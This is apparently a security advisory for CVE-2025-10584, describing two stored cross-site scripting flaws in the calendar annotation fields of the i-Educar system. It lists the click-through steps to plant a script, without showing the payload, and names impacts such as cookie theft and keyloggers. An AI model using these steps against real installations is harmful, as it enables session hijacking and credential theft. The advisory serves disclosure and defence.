Key Information Vulnerability ID CVE-2025-10584 Vulnerability Type Cross-Site Scripting (XSS) Affected System i-Educar system's file Vulnerability Description During analysis of the calendar registration functionality, two stored XSS vulnerabilities were identified. The and parameters do not properly validate user input, allowing malicious scripts to be stored and automatically executed when accessing the page. Technical Details Vulnerable Endpoint: Affected Parameters: and Trigger Page: Exploitation Method Access the vulnerable endpoint and click “New Calendar in List”. On the new page, click “New Annotation”. Insert payload into the “Nome” and “Descrição” fields. Click “Save”. Impact This XSS vulnerability can be exploited to: - Steal session cookies to hijack user sessions. - Install keyloggers. - Steal credentials stored in the browser. - Redirect users to malicious websites. - Tamper with the application interface. - Damage brand reputation. Conclusion Even seemingly harmless fields, such as internal company annotations, can serve as carriers for stored XSS. When displayed in administrative panels, without proper validation and output encoding, they introduce new threats. Ensuring input validation for every form—regardless of how trivial the field may appear—is critical for maintaining web application security.